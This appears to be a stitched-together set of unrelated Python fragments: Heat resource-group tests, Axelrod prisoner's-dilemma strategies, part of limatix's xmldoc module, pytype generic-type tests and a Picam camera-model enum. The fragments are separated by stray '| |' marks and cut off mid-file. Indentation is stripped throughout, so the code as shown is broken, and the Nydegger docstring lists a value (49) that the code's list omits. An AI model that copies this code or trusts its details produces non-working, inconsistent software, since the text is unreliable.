self.assertIsNone(resg.FnGetAtt("refs", 2))
def test_aggregate_refs_map(self):
resg = self._create_dummy_stack()
found = resg.FnGetAtt("refs_map")
expected = {'0': 'ID-0', '1': 'ID-1'}
self.assertEqual(expected, found)
def test_aggregate_outputs(self):
"""Test outputs aggregation."""
expected = {'0': ['foo', 'bar'], '1': ['foo', 'bar']}
resg = self._create_dummy_stack(template_attr, expect_attrs=expected)
self.assertEqual(expected, resg.FnGetAtt('attributes', 'list'))
def test_aggregate_outputs_no_path(self):
"""Test outputs aggregation with missing path."""
resg = self._create_dummy_stack(template_attr)
self.assertRaises(exception.InvalidTemplateAttribute,
resg.FnGetAtt, 'attributes')
def test_index_refs(self):
"""Tests getting ids of individual resources."""
resg = self._create_dummy_stack()
self.assertEqual("ID-0", resg.FnGetAtt('resource.0'))
self.assertEqual("ID-1", resg.FnGetAtt('resource.1'))
ex = | |
"""
Additional strategies from Axelrod's first tournament.
"""
import random
from typing import Dict, List, Tuple
from axelrod.action import Action
from axelrod.player import Player
from axelrod.random_ import random_choice
from axelrod.strategy_transformers import FinalTransformer
from scipy.stats import chisquare
from .memoryone import MemoryOnePlayer
C, D = Action.C, Action.D
class Davis(Player):
"""
Submitted to Axelrod's first tournament by <NAME>.
A player starts by cooperating for 10 rounds then plays Grudger,
defecting if at any point the opponent has defected.
This strategy came 8th in Axelrod's original tournament.
Names:
- Davis: [Axelrod1980]_
"""
name = "Davis"
classifier = {
"memory_depth": float("inf"), # Long memory
"stochastic": False,
"makes_use_of": set(),
"long_run_time": False,
"inspects_source": False,
"manipulates_source": False,
"manipulates_state": False,
}
def __init__(self, rounds_to_cooperate: int = 10) -> None:
"""
Parameters
----------
rounds_to_cooperate: int, 10
The number of rounds to cooperate initially
"""
super().__init__()
self._rounds_to_cooperate = rounds_to_cooperate
def strategy(self, opponent: Player) -> Action:
"""Begins by playing C, then plays D for the remaining rounds if the
opponent ever plays D."""
if len(self.history) < self._rounds_to_cooperate:
return C
if opponent.defections:
return D
return C
class RevisedDowning(Player):
"""This strategy attempts to estimate the next move of the opponent by estimating
the probability of cooperating given that they defected (:math:`p(C|D)`) or
cooperated on the previous round (:math:`p(C|C)`). These probabilities are
continuously updated during play and the strategy attempts to maximise the long
term play. Note that the initial values are :math:`p(C|C)=p(C|D)=.5`.
Downing is implemented as `RevisedDowning`. Apparently in the first tournament
the strategy was implemented incorrectly and defected on the first two rounds.
This can be controlled by setting `revised=True` to prevent the initial defections.
This strategy came 10th in Axelrod's original tournament but would have won
if it had been implemented correctly.
Names:
- Revised Downing: [Axelrod1980]_
"""
name = "<NAME>"
classifier = {
"memory_depth": float("inf"),
"stochastic": False,
"makes_use_of": set(),
"long_run_time": False,
"inspects_source": False,
"manipulates_source": False,
"manipulates_state": False,
}
def __init__(self, revised: bool = True) -> None:
super().__init__()
self.revised = revised
self.good = 1.0
self.bad = 0.0
self.nice1 = 0
self.nice2 = 0
self.total_C = 0 # note the same as self.cooperations
self.total_D = 0 # note the same as self.defections
def strategy(self, opponent: Player) -> Action:
round_number = len(self.history) + 1
# According to internet sources, the original implementation defected
# on the first two moves. Otherwise it wins (if this code is removed
# and the comment restored.
# http://www.sci.brooklyn.cuny.edu/~sklar/teaching/f05/alife/notes/azhar-ipd-Oct19th.pdf
if self.revised:
if round_number == 1:
return C
elif not self.revised:
if round_number <= 2:
return D
# Update various counts
if round_number > 2:
if self.history[-1] == D:
if opponent.history[-1] == C:
self.nice2 += 1
self.total_D += 1
self.bad = self.nice2 / self.total_D
else:
if opponent.history[-1] == C:
self.nice1 += 1
self.total_C += 1
self.good = self.nice1 / self.total_C
# Make a decision based on the accrued counts
c = 6.0 * self.good - 8.0 * self.bad - 2
alt = 4.0 * self.good - 5.0 * self.bad - 1
if c >= 0 and c >= alt:
move = C
elif (c >= 0 and c < alt) or (alt >= 0):
move = self.history[-1].flip()
else:
move = D
return move
class Feld(Player):
"""
Submitted to Axelrod's first tournament by <NAME>.
This strategy plays Tit For Tat, always defecting if the opponent defects but
cooperating when the opponent cooperates with a gradually decreasing probability
until it is only .5.
This strategy came 11th in Axelrod's original tournament.
Names:
- Feld: [Axelrod1980]_
"""
name = "Feld"
classifier = {
"memory_depth": 200, # Varies actually, eventually becomes depth 1
"stochastic": True,
"makes_use_of": set(),
"long_run_time": False,
"inspects_source": False,
"manipulates_source": False,
"manipulates_state": False,
}
def __init__(
self,
start_coop_prob: float = 1.0,
end_coop_prob: float = 0.5,
rounds_of_decay: int = 200,
) -> None:
"""
Parameters
----------
start_coop_prob, float
The initial probability to cooperate
end_coop_prob, float
The final probability to cooperate
rounds_of_decay, int
The number of rounds to linearly decrease from start_coop_prob
to end_coop_prob
"""
super().__init__()
self._start_coop_prob = start_coop_prob
self._end_coop_prob = end_coop_prob
self._rounds_of_decay = rounds_of_decay
def _cooperation_probability(self) -> float:
"""It's not clear what the interpolating function is, so we'll do
something simple that decreases monotonically from 1.0 to 0.5 over
200 rounds."""
diff = self._end_coop_prob - self._start_coop_prob
slope = diff / self._rounds_of_decay
rounds = len(self.history)
return max(self._start_coop_prob + slope * rounds, self._end_coop_prob)
def strategy(self, opponent: Player) -> Action:
if not opponent.history:
return C
if opponent.history[-1] == D:
return D
p = self._cooperation_probability()
return random_choice(p)
class Grofman(Player):
"""
Submitted to Axelrod's first tournament by <NAME>.
Cooperate on the first two rounds and
returns the opponent's last action for the next 5. For the rest of the game
Grofman cooperates if both players selected the same action in the previous
round, and otherwise cooperates randomly with probability 2/7.
This strategy came 4th in Axelrod's original tournament.
Names:
- Grofman: [Axelrod1980]_
"""
name = "Grofman"
classifier = {
"memory_depth": float("inf"),
"stochastic": True,
"makes_use_of": set(),
"long_run_time": False,
"inspects_source": False,
"manipulates_source": False,
"manipulates_state": False,
}
def strategy(self, opponent: Player) -> Action:
round_number = len(self.history) + 1
if round_number < 3:
return C
if round_number < 8:
return opponent.history[-1]
if self.history[-1] == opponent.history[-1]:
return C
return random_choice(2 / 7)
class Joss(MemoryOnePlayer):
"""
Submitted to Axelrod's first tournament by <NAME>.
Cooperates with probability 0.9 when the opponent cooperates, otherwise
emulates Tit-For-Tat.
This strategy came 12th in Axelrod's original tournament.
Names:
- Joss: [Axelrod1980]_
- <NAME>: [Stewart2012]_
"""
name = "Joss"
def __init__(self, p: float = 0.9) -> None:
"""
Parameters
----------
p, float
The probability of cooperating when the previous round was (C, C)
or (D, C), i.e. the opponent cooperated.
"""
four_vector = (p, 0, p, 0)
self.p = p
super().__init__(four_vector)
class Nydegger(Player):
"""
Submitted to Axelrod's first tournament by <NAME>.
The program begins with tit for tat for the first three moves, except
that if it was the only one to cooperate on the first move and the only one
to defect on the second move, it defects on the third move. After the
third move, its choice is determined from the 3 preceding outcomes in the
following manner.
.. math::
A = 16 a_1 + 4 a_2 + a_3
Where :math:`a_i` is dependent on the outcome of the previous :math:`i` th
round. If both strategies defect, :math:`a_i=3`, if the opponent only defects:
:math:`a_i=2` and finally if it is only this strategy that defects then
:math:`a_i=1`.
Finally this strategy defects if and only if:
.. math::
A \in \{1, 6, 7, 17, 22, 23, 26, 29, 30, 31, 33, 38, 39, 45, 49, 54, 55, 58, 61\}
Thus if all three preceding moves are mutual defection, A = 63 and the rule
cooperates. This rule was designed for use in laboratory experiments as a
stooge which had a memory and appeared to be trustworthy, potentially
cooperative, but not gullible.
This strategy came 3rd in Axelrod's original tournament.
Names:
- Nydegger: [Axelrod1980]_
"""
name = "Nydegger"
classifier = {
"memory_depth": 3,
"stochastic": False,
"makes_use_of": set(),
"long_run_time": False,
"inspects_source": False,
"manipulates_source": False,
"manipulates_state": False,
}
def __init__(self) -> None:
self.As = [1, 6, 7, 17, 22, 23, 26, 29, 30, 31, 33, 38, 39, 45, 54, 55, 58, 61]
self.score_map = {(C, C): 0, (C, D): 2, (D, C): 1, (D, D): 3}
super().__init__()
@staticmethod
def score_history(
my_history: List[Action],
opponent_history: List[Action],
score_map: Dict[Tuple[Action, Action], int],
) -> int:
"""Implements the Nydegger formula A = 16 a_1 + 4 a_2 + a_3"""
a = 0
for i, weight in [(-1, 16), (-2, 4), (-3, 1)]:
plays = (my_history[i], opponent_history[i])
a += weight * score_map[plays]
return a
def strategy(self, opponent: Player) -> Action:
if len(self.history) == 0:
return C
if len(self.history) == 1:
# TFT
return D if opponent.history[-1] == D else C
if len(self.history) == 2:
if opponent.history[0:2] == [D, C]:
return D
else:
# TFT
return D if opponent.history[-1] == D else C
A = self.score_history(self.history[-3:], opponent.history[-3:], self.score_map)
if A in self.As:
return D
return C
class Shubik(Player):
"""
| |
<filename>limatix/xmldoc.py
from lxml import etree
import os
import os.path
import copy
import sys
import traceback
import numbers
import signal
import socket
import time
import shutil
import collections
import xml.sax.saxutils
try:
# py2.x
from urllib import pathname2url
from urllib import url2pathname
import urlparse
pass
except ImportError:
import urllib.parse as urlparse # python3
from urllib.request import pathname2url
from urllib.request import url2pathname
pass
import urllib
if os.name=='nt':
# win32 fcntl.flock alternative:
# loosely based on http://code.activestate.com/recipes/65203/
import win32con
import win32file
import pywintypes
pwt__overlapped = pywintypes.OVERLAPPED()
pass
else:
import fcntl
pass
try:
from . import provenance as provenance
pass
except ImportError:
sys.stderr.write("xmldoc: Warning provenance support not available\n")
# Create dummy class "provenance" that makes provenance calls into no-ops
class provenance(object):
@classmethod
def xmldocelementaccessed(cls,xmldocu,element):
pass
@classmethod
def warnnoprovenance(cls,msg):
pass
@classmethod
def elementgenerated(cls,doc,element):
pass
pass
pass
import numpy as np
from . import lm_units as lmu
from . import dc_value
try:
from .canonicalize_path import canonicalize_path
from .canonicalize_path import relative_path_to
pass
except ImportError:
from os.path import realpath as canonicalize_path
relative_path_to=lambda start,path: os.path.relpath(path,start)
pass
try:
from .canonicalize_path import canonicalize_etxpath
from .canonicalize_path import getelementetxpath
from .canonicalize_path import create_canonical_etxpath
from .canonicalize_path import canonical_etxpath_split
from .canonicalize_path import canonical_etxpath_join
from .canonicalize_path import canonical_etxpath_absjoin
from .canonicalize_path import etxpath_isabs
from .canonicalize_path import etxpath2human
pass
except ImportError:
canonicalize_etxpath=None
pass
try:
from cStringIO import StringIO
pass
except ImportError:
from io import StringIO
pass
try:
import builtins # python3
pass
except ImportError:
import __builtin__ as builtins # python2
pass
if not hasattr(builtins,"basestring"):
basestring=str # python3
unicode=str # python3
pass
gtk=None
gobject=None
class fileinfo(object):
mtime=None
inode=None
size=None
def __init__(self,fd):
statbuf=os.fstat(fd)
self.mtime=statbuf.st_mtime
self.inode=statbuf.st_ino
self.size=statbuf.st_size
pass
def __str__(self):
return "xmldoc.fileinfo(mtime=%d,inode=%d,size=%d)" % (self.mtime,self.inode,self.size)
def __eq__(self,other):
return self.mtime==other.mtime and self.inode==other.inode and self.size==other.size
def __ne__(self,other):
return not self.__eq__(other)
def loadgtk():
global gtk
if gtk is None:
if "gi" in sys.modules: # gtk3
import gi
gi.require_version('Gtk','3.0')
from gi.repository import Gtk as gtk
pass
else :
# gtk2
import gtk
pass
pass
pass
def loadgobject():
global gobject
if gobject is None:
if "gi" in sys.modules: # gtk3
from gi.repository import GObject as gobject
pass
else :
# gtk2
import gobject
pass
pass
pass
startuptime=None
def generate_inmemory_id(checklist):
global startuptime
hostname=socket.gethostname()
if startuptime is None:
startuptime=time.time() # log a hopefully unique value
pass
pid=os.getpid()
return "mem://%s/%d/%d/%d" % (hostname,startuptime,pid,id(checklist))
def _xlinkcontextfixuptree(ETree,oldcontexthref,newcontexthref,force_abs_href=False):
# Go through ETree, search for elements with xlink:href
# attributes, fix them up.
# operates in-place on provided etree.ElementTree or etree.Element
# force_abs_href causes all relative links to be shifted to absolute links
# (appropriate if the new location is a fundamental move)
# returns number of modifications made
ETXobj=etree.ETXPath("descendant-or-self::*[@{http://www.w3.org/1999/xlink}href]")
xmlellist=ETXobj(ETree)
modcnt=0
for element in xmlellist:
URL=element.attrib["{http://www.w3.org/1999/xlink}href"]
href=dc_value.hrefvalue(URL,contexthref=oldcontexthref)
if force_abs_href or (newcontexthref is None) or newcontexthref.isblank():
newurl=href.absurl()
pass
else:
newurl=href.attempt_relative_url(newcontexthref)
pass
if newurl != URL:
element.attrib["{http://www.w3.org/1999/xlink}href"]=newurl
modcnt+=1
pass
pass
return modcnt
try:
from databrowse.lib import db_lib as dbl
pass
except ImportError:
dbl=None
pass
__pychecker__="no-argsused"
# !!! Very important: Only modify the xmldoc using its member functions (otherwise the modification tracking
# will not work)
# !!! Very important: Do not keep deep references inside the xmldoc. These may change due to a resync().
# Save element locations with savepath(). You can later reextract elements
# after the resync() with restorepath(). This will work properly so
# long as no elements have been added to the tree upward of where you
# are looking.
# Namespace management
# --------------------
# When you create an xmldoc, you specify a namespace mapping that
# gets encoded into the root node. (If no mapping is provided, a default
# is used). When working with the xmldoc in memory and syncing to disk,
# the in-memory mapping and the root node mapping are kept distinct.
# When you add an in-memory mapping with merge_namespace or resync an
# on-disk copy that may be missing one of these namespaces, xmldoc
# will add add any additional prefix mappings that might be in the
# in-memory mapping to the root node to the root node mapping, so long
# as they do not conflict (either in prefix or namespace) with an existing
# mapping.
# When you try to access elements, only the in-memory mapping is used.
# The root node mapping is entirely irrelevant except that it is what is used
# when manually editing the file as written to disk
# xmldoc limitations
# -----------------
# * Not thread safe: See use of signal() to hold off SIGINT during
# _flush() update and use of lxml which itself is not thread safe
# * Does not properly handle XML comments within simple tags (within
# compound tags OK). The problem is we use lxml's ".text" object
# attribute, which only gives us the first text node.
#
# Future plans
# ------------
# 1. Fix deep references in checklist steps. DONE
# 2. Add support for multiple layers of backup files. DONE
# 3. Eliminate xmlgrab2 PENDING
# 4. Implement file locking and explicit modification and critical regions. DONE
# 5. Fix up provenance handling in recursive operations. Specifically copyelements()
class xmldoc(object):
"""
xmldoc is a class that represents readable (and optionally writable)
xml documents. This class supports synchronization to disk (flushing
of changes, reading in external changes) when requested.
Because of the potential for rereading, and therefore
invalidation of all of the element objects, you should
never store references to elements. Instead you
should use use xmldoc.getpath() to get the element
location which can be stored instead. Get a new
reference when needed with xmldoc.xpathsingle()
(NOTE: getpath() results are not compatible with find())
XPaths and find() vs. xpath()
-----------------------------
find() is a lighter-weight call that still has some matching
capability but is quite a bit simpler.
The big difference is that find() does not handle leading
slashes in the path. So with find, you can't specify
"/chx:checklist/chx:checkitem[3]", you must just specify
"chx:checkitem[3].
For both, the main tag is the context node for the search.
So just leave off the leading slash and main tag name from
the search, and everything will work as expected.
"""
# Please consider all class variables to be private!
doc=None # lxml etree document representation !!! private!!!
olddoc=None # when unlocked, doc is none, olddoc is reference to old, unused document
filehref=None # Currently set href (formerly filename), or None
_filename=None # private filename, for convenience... should always be equal to href.getpath()
contexthref=None # If href is None, this dc_value.hrefvalue is the contextual
# location.
nsmap=None # prefix-to-namespace mapping
namespaces=None # copy of nsmap for xpath queries with None element removed
modified=None # Has the tree been modified since the last flush?
resyncnotify=None # List of recipients to notify after each resync
# autoflush=None # Automatically flush on modification?
# autoresync=None # If set, resync() will be be called automatically when
# before elements that are synced with paramdb2 are
# updated.
# (In general, you should manually resync immediately
# before changing the document, but be warned that
# elements need to be re-found once you do this!)
readonly=None # True if writing is disabled.
use_databrowse=None # True if we should use databrowse to read input.
extensions=None # list of xpath extensions to provide by default
num_backups=None # Number of backup files to keep when writing
use_locking=None # Use file locking
nodialogs=None # disable GUI dialogs
debug=None # Enable paranoid debugging?
debug_last_serialized=None # for debugging... copy of last serialized version
lastfileinfo=None # Class fileinfo for most recently seen on-disk copy
ro_lockcount=None # no. of times locked readonly
rw_lockcount=None # no. of times locked readwrite
lockfd=None # file descriptor currently used for locking, or -1. If this is not -1 then this decriptor is locked. This should be close()'d when you unlock. This should always be set if ro_lockcount or rw_lockcount > 0 and filename is set, cleared otherwise
lockfh=None # file handle currently used for locking, for NT which requires that the file be left open and reused
possible_root_ids=None # set of id() values that we will | |
"""Tests for handling GenericType."""
from pytype import file_utils
from pytype.tests import test_base
class GenericTest(test_base.BaseTest):
"""Tests for GenericType."""
def test_basic(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import List, TypeVar
T = TypeVar("T")
class A(List[T]): pass
def f() -> A[int]: ...
""")
ty = self.Infer("""
import a
def f():
return a.f()
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
def f() -> a.A[int]: ...
""")
def test_binop(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import List, TypeVar
T = TypeVar("T")
class A(List[T]): pass
""")
ty = self.Infer("""
from a import A
def f():
return A() + [42]
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
from typing import List, Type
A = ... # type: Type[a.A]
def f() -> List[int]: ...
""")
def test_specialized(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Dict, TypeVar
K = TypeVar("K")
V = TypeVar("V")
class A(Dict[K, V]): pass
class B(A[str, int]): pass
""")
ty = self.Infer("""
import a
def foo():
return a.B()
def bar():
x = foo()
return {list(x.keys())[0]: list(x.values())[0]}
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
def foo() -> a.B: ...
def bar() -> dict[str, int]: ...
""")
def test_specialized_mutation(self):
with file_utils.Tempdir() as d1:
with file_utils.Tempdir() as d2:
d1.create_file("a.pyi", """
from typing import List, TypeVar
T = TypeVar("T")
class A(List[T]): pass
""")
d2.create_file("b.pyi", """
import a
class B(a.A[int]): pass
""")
ty = self.Infer("""
import b
def foo():
x = b.B()
x.extend(["str"])
return x
def bar():
return foo()[0]
""", pythonpath=[d1.path, d2.path])
self.assertTypesMatchPytd(ty, """
import b
from typing import Union
def foo() -> b.B: ...
def bar() -> Union[int, str]: ...
""")
def test_specialized_partial(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Dict, TypeVar
V = TypeVar("V")
class A(Dict[str, V]): pass
class B(A[int]): pass
""")
ty = self.Infer("""
import a
def foo():
return a.A()
def bar():
return list(foo().keys())
def baz():
return a.B()
def qux():
return list(baz().items())
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
from typing import List, Tuple
import a
def foo() -> a.A[nothing]: ...
def bar() -> List[str]: ...
def baz() -> a.B: ...
def qux() -> List[Tuple[str, int]]: ...
""")
def test_type_parameter(self):
with file_utils.Tempdir() as d:
d.create_file("foo.pyi", """
from typing import Generic, TypeVar
T = TypeVar("T")
class A(Generic[T]):
def bar(self) -> T: ...
class B(A[int]): ...
""")
ty = self.Infer("""
import foo
def f():
return foo.B().bar()
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import foo
def f() -> int: ...
""")
def test_type_parameter_renaming(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import List, TypeVar
U = TypeVar("U")
class A(List[U]): pass
class B(A[int]): pass
""")
ty = self.Infer("""
import a
def foo():
return a.A()
def bar():
return a.B()[0]
def baz():
x = a.B()
x.extend(["str"])
return x[0]
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
from typing import Union
import a
def foo() -> a.A[nothing]: ...
def bar() -> int: ...
def baz() -> Union[int, str]: ...
""")
def test_type_parameter_renaming_chain(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import List, Set, TypeVar, Union
A = TypeVar("A")
B = TypeVar("B")
class Foo(List[A]):
def foo(self) -> None:
self = Foo[Union[A, complex]]
class Bar(Foo[B], Set[B]):
def bar(self) -> B: ...
""")
ty = self.Infer("""
import a
def f():
x = a.Bar([42])
x.foo()
x.extend(["str"])
x.add(float(3))
return x.bar()
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
from typing import Union
import a
def f() -> Union[int, float, complex, str]: ...
""")
def test_type_parameter_renaming_conflict1(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, Tuple, TypeVar
T1 = TypeVar("T1")
T2 = TypeVar("T2")
T3 = TypeVar("T3")
class A(Generic[T1]):
def f(self) -> T1: ...
class B(Generic[T1]):
def g(self) -> T1: ...
class C(A[T2], B[T3]):
def __init__(self):
self = C[int, str]
def h(self) -> Tuple[T2, T3]: ...
""")
ty = self.Infer("""
import a
v1 = a.C().f()
v2 = a.C().g()
v3 = a.C().h()
""", deep=False, pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
from typing import Any, Tuple
import a
v1 = ... # type: int
v2 = ... # type: str
v3 = ... # type: Tuple[int, str]
""")
def test_type_parameter_renaming_conflict2(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, TypeVar
T1 = TypeVar("T1")
T2 = TypeVar("T2")
T3 = TypeVar("T3")
class A(Generic[T1]):
def f(self) -> T1: ...
class B(Generic[T2]):
def g(self) -> T2: ...
class C(A[T3], B[T3]):
def __init__(self):
self = C[str]
""")
ty = self.Infer("""
import a
v = a.C().f()
w = a.C().g()
""", deep=False, pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
v = ... # type: str
w = ... # type: str
""")
def test_change_multiply_renamed_type_parameter(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, TypeVar
T1 = TypeVar("T1")
T2 = TypeVar("T2")
T3 = TypeVar("T3")
class A(Generic[T1]):
def f(self):
self = A[str]
class B(Generic[T1]): ...
class C(A[T2], B[T3]):
def g(self):
self= C[int, float]
""")
ty = self.Infer("""
import a
v = a.C()
v.f()
v.g()
""", deep=False, pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
from typing import Union
import a
# T1, T2, and T3 are all set to Any due to T1 being an alias for both
# T2 and T3.
v = ... # type: a.C[int, Union[float, int]]
""")
def test_type_parameter_deep(self):
with file_utils.Tempdir() as d:
d.create_file("foo.pyi", """
from typing import Generic, TypeVar
U = TypeVar("U")
V = TypeVar("V")
class A(Generic[U]):
def bar(self) -> U: ...
class B(A[V], Generic[V]): ...
def baz() -> B[int]: ...
""")
ty = self.Infer("""
import foo
def f():
return foo.baz().bar()
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import foo
def f() -> int: ...
""")
def test_type_parameter_import(self):
with file_utils.Tempdir() as d1:
d1.create_file("a.pyi", """
T = TypeVar("T")
""")
with file_utils.Tempdir() as d2:
d2.create_file("b.pyi", """
from typing import Generic, Union
from a import T
class A(Generic[T]):
def __init__(self, x: T) -> None:
self = A[Union[int, T]]
def a(self) -> T: ...
""")
ty = self.Infer("""
import b
def f():
return b.A("hello world")
def g():
return b.A(3.14).a()
""", pythonpath=[d1.path, d2.path])
self.assertTypesMatchPytd(ty, """
import b
from typing import Union
def f() -> b.A[Union[int, str]]: ...
def g() -> Union[int, float]: ...
""")
def test_type_parameter_conflict(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, TypeVar
T = TypeVar("T")
K = TypeVar("K")
V = TypeVar("V")
class MyIterable(Generic[T]): pass
class MyList(MyIterable[T]): pass
class MyDict(MyIterable[K], Generic[K, V]): pass
class Custom(MyDict[K, V], MyList[V]): pass
""")
ty = self.Infer("""
import a
x = a.Custom()
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
x = ... # type: a.Custom[nothing, nothing]
""")
def test_type_parameter_ambiguous(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, List
T = TypeVar("T")
class A(Generic[T]): pass
class B(A[int]): pass
class C(List[T], B): pass
""")
ty = self.Infer("""
import a
def f():
x = a.C()
return x
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
def f() -> a.C[nothing]: ...
""")
def test_type_parameter_duplicated(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, Dict
T = TypeVar("T")
class A(Dict[T, T], Generic[T]): pass
""")
ty = self.Infer("""
import a
def f():
x = a.A()
x[1] = 2
return x
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
import a
def f() -> a.A[int]: ...
""")
def test_union(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import List, Union
class A(List[Union[int, str]]): pass
""")
ty = self.Infer("""
import a
def f():
return a.A()
def g():
return f()[0]
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
from typing import Union
import a
def f() -> a.A: ...
def g() -> Union[int, str]: ...
""")
def test_multiple_templates(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, List, TypeVar
K = TypeVar("K")
V = TypeVar("V")
class MyDict(Generic[K, V]): pass
class A(MyDict[K, V], List[V]): pass
""")
ty = self.Infer("""
import a
def f():
x = a.A()
x.extend([42])
return x
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
def f() -> a.A[nothing, int]: ...
""")
def test_multiple_templates_flipped(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Dict, Generic, TypeVar
K = TypeVar("K")
V = TypeVar("V")
class MyList(Generic[V]):
def __getitem__(self, x: int) -> V: ...
class A(MyList[V], Dict[K, V]):
def a(self) -> K: ...
""")
ty = self.Infer("""
import a
def f():
x = a.A()
x.update({"hello": 0})
return x
def g():
return f().a()
def h():
return f()[0]
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
def f() -> a.A[str, int]: ...
def g() -> str: ...
def h() | |
PicamModel_NirvanaST640 = 1301,
/*------------------------------------------------------------------------*/
/* NIRvana-LN Series (1102) ----------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamModel_NirvanaLNSeries = 1100,
PicamModel_NirvanaLN640 = 1101
/*------------------------------------------------------------------------*/
} PicamModel;
"""
PicamModelEnum = PI_Enum(
"PicamModelEnum", dict(
#/*------------------------------------------------------------------------*/
#/* PI-MTE Series (1419) --------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_PIMteSeries = 1400,
#/* PI-MTE 1024 Series ----------------------------------------------------*/
PicamModel_PIMte1024Series = 1401,
PicamModel_PIMte1024F = 1402,
PicamModel_PIMte1024B = 1403,
PicamModel_PIMte1024BR = 1405,
PicamModel_PIMte1024BUV = 1404,
#/* PI-MTE 1024FT Series --------------------------------------------------*/
PicamModel_PIMte1024FTSeries = 1406,
PicamModel_PIMte1024FT = 1407,
PicamModel_PIMte1024BFT = 1408,
#/* PI-MTE 1300 Series ----------------------------------------------------*/
PicamModel_PIMte1300Series = 1412,
PicamModel_PIMte1300B = 1413,
PicamModel_PIMte1300R = 1414,
PicamModel_PIMte1300BR = 1415,
#/* PI-MTE 2048 Series ----------------------------------------------------*/
PicamModel_PIMte2048Series = 1416,
PicamModel_PIMte2048B = 1417,
PicamModel_PIMte2048BR = 1418,
#/* PI-MTE 2K Series ------------------------------------------------------*/
PicamModel_PIMte2KSeries = 1409,
PicamModel_PIMte2KB = 1410,
PicamModel_PIMte2KBUV = 1411,
#/*------------------------------------------------------------------------*/
#/* PIXIS Series (76) -----------------------------------------------------*/
#/*------------------------------------------------------------------------*/
PicamModel_PixisSeries = 0,
#/* PIXIS 100 Series ------------------------------------------------------*/
PicamModel_Pixis100Series = 1,
PicamModel_Pixis100F = 2,
PicamModel_Pixis100B = 6,
PicamModel_Pixis100R = 3,
PicamModel_Pixis100C = 4,
PicamModel_Pixis100BR = 5,
PicamModel_Pixis100BExcelon = 54,
PicamModel_Pixis100BRExcelon = 55,
PicamModel_PixisXO100B = 7,
PicamModel_PixisXO100BR = 8,
PicamModel_PixisXB100B = 68,
PicamModel_PixisXB100BR = 69,
#/* PIXIS 256 Series ------------------------------------------------------*/
PicamModel_Pixis256Series = 26,
PicamModel_Pixis256F = 27,
PicamModel_Pixis256B = 29,
PicamModel_Pixis256E = 28,
PicamModel_Pixis256BR = 30,
PicamModel_PixisXB256BR = 31,
#/* PIXIS 400 Series ------------------------------------------------------*/
PicamModel_Pixis400Series = 37,
PicamModel_Pixis400F = 38,
PicamModel_Pixis400B = 40,
PicamModel_Pixis400R = 39,
PicamModel_Pixis400BR = 41,
PicamModel_Pixis400BExcelon = 56,
PicamModel_Pixis400BRExcelon = 57,
PicamModel_PixisXO400B = 42,
PicamModel_PixisXB400BR = 70,
#/* PIXIS 512 Series ------------------------------------------------------*/
PicamModel_Pixis512Series = 43,
PicamModel_Pixis512F = 44,
PicamModel_Pixis512B = 45,
PicamModel_Pixis512BUV = 46,
PicamModel_Pixis512BExcelon = 58,
PicamModel_PixisXO512F = 49,
PicamModel_PixisXO512B = 50,
PicamModel_PixisXF512F = 48,
PicamModel_PixisXF512B = 47,
#/* PIXIS 1024 Series -----------------------------------------------------*/
PicamModel_Pixis1024Series = 9,
PicamModel_Pixis1024F = 10,
PicamModel_Pixis1024B = 11,
PicamModel_Pixis1024BR = 13,
PicamModel_Pixis1024BUV = 12,
PicamModel_Pixis1024BExcelon = 59,
PicamModel_Pixis1024BRExcelon = 60,
PicamModel_PixisXO1024F = 16,
PicamModel_PixisXO1024B = 14,
PicamModel_PixisXO1024BR = 15,
PicamModel_PixisXF1024F = 17,
PicamModel_PixisXF1024B = 18,
PicamModel_PixisXB1024BR = 71,
#/* PIXIS 1300 Series -----------------------------------------------------*/
PicamModel_Pixis1300Series = 51,
PicamModel_Pixis1300F = 52,
PicamModel_Pixis1300F_2 = 75,
PicamModel_Pixis1300B = 53,
PicamModel_Pixis1300BR = 73,
PicamModel_Pixis1300BExcelon = 61,
PicamModel_Pixis1300BRExcelon = 62,
PicamModel_PixisXO1300B = 65,
PicamModel_PixisXF1300B = 66,
PicamModel_PixisXB1300R = 72,
#/* PIXIS 2048 Series -----------------------------------------------------*/
PicamModel_Pixis2048Series = 20,
PicamModel_Pixis2048F = 21,
PicamModel_Pixis2048B = 22,
PicamModel_Pixis2048BR = 67,
PicamModel_Pixis2048BExcelon = 63,
PicamModel_Pixis2048BRExcelon = 74,
